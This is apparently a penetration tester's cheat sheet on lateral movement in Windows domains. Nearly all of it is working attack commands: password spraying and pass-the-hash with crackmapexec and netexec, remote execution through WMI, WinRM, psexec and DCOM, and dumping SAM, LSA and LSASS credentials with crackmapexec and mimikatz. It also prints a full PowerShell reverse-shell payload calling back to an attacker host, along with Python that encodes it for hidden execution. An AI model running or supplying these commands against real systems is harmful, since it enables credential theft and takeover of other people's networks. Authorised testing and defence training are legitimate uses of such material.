Lateral Movement

https://wadcoms.github.io/#

Spraying with crackmapexec

Try using username as a password and brute force with rockyou.txt Also use --local-auth intead of -d <domain>

Usernames and passwords:

crackmapexec smb <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>

crackmapexec winrm <IP/SUBNET> -u users.txt -p passwords.txt -d <domain>

crackmapexec rdp <IP/SUBNET> -u users.txt -p passwords.txt --continue-on-success --rdp-timeout 30

Hashes

crackmapexec smb <IP/SUBNET> -u users.txt -hashes <HASH> -d <domain>

crackmapexec winrm <IP/SUBNET> -u users.txt -hashes <HASH> -d <domain>

WMI / WinRM (PORT 5985 / 5986)

WMI

With WMI we can create process on the target machine.

If ReturnValue = 0 the process has been created successfully.

wmic /node:<IP> /user:<USER> /password:<PASSWORD> process call create "calc"

PowerShell exploitation

Store the credentials in PSCredential object:

$username = '<USERNAME>';
$password = '<PASSWORD>';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

Create Common Information Model (CIM):

$options = New-CimSessionOption -Protocol DCOM
$session = New-Cimsession -ComputerName <IP> -Credential $credential -SessionOption $Options 
$command = 'calc';

Invoke Cim:

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

You can call reverse shell instead of calc and update the $Command parameter.

Generate base64 encoded paylaod with python on kali machine:

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<IP>",<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

WinRM

Can be used as non administrator.

There is also WinRM powershell alternative: WinRS

In order to use evil-winrm you need username and password of the user.

Copy

evil-winrm -i <IP_ADDRESS> -u <USERNAME> -p <PASSWORD>

PsExec /wmiexec / smbexec (PORT 445)

User has to have Administrative rights. ADMIN$ share has to be present.

You can use psexec, smbexec if you have user credentials or NTLM hash. Any folder has to be writeable.

Credentials

Copy

impacket-psexec <domain>/<user>:<password>@<victim_ip>

Hash

Copy

impacket-psexec <domain>/<user>@<victim_ip> -hashes <LMHash:NTHash> # you can fill LMHash with 32 0

Pass the Hash

Port 445 has to be enabled.

Pass the Hash method works only for NTLMv1

If we crack a password and/or can dump the SAM hashes, we can leverege both for lateral movement in networks.

Pass the password

You can pass the credentials to netexec and scan the network:

netexec smb 10.10.10.10/24 -u user -p Password1 -d contoso.com --local-auth # change network, domain and credentials

Pass the hash

You can pass the NTLM hash to netexec and scan the network in the same way as above:

crackmapexec smb <3_OCTET_IP>.0/24 -u <USER> -H <HASH> --local-auth # change IP, mask, user, hash

More info

Use CME to dump valuable data:

crackmapexec smb 10.10.10.10/24 -u administrator -H a21aavioe2akdrf3a542 --local-auth --sam # change IP, mask, user, hash

Dump the LSA:

crackmapexec smb 10.10.10.10/24 -u administrator -H a21aavioe2akdrf3a542 --local-auth --lsa # change IP, mask, user, hash

Check built in modules:

crackmapexec smb -L

Dump the LSASS credentials (returns NTLM hash):

crackmapexec smb 10.10.10.10/24 -u administrator -H a21aavioe2akdrf3a542 --local-auth -M lsassy # change IP, mask, user, hash

Netexec database:

cmedb

Access the share:

smbclient \\\\<IP>\\<SHARE> -U <USER> --pw-nt-hash <HASH>

Code execution

impacket-wmiexec -hashes :<NTLM_HASH> <USER>@<IP>

Overpass the hash

TGT can be used only on the machine we used it for.

Abuse an NTLM user hash to gain a full Kerberos TGT.

sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:powershell

Generate kerberos ticket:

net use \\<share>

List Kerberos tickets:

klist

Reuse the TGT:

.\PsExec.exe \\<SHARE> cmd

Pass the ticket

No administrative privileges required.

Takes advantage of TGS which can be re-enjected elsewhere on the network. Method of taking someone else TGS and using it for our own session.

Export all tickets from the memory using mimikatz:

 sekurlsa::tickets /export

Verify tickets existence:

dir *.kirbi

Use the exported ticket:

kerberos::ptt <TICKET>

DCOM

Local Administrator access and PORT 135 is required.

Create DCOM instance:

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP>"))

Execute shell command:

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

Execute reverse shell encoded in base64:

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e <BASE64_ENCODED_PAYLOAD>","7")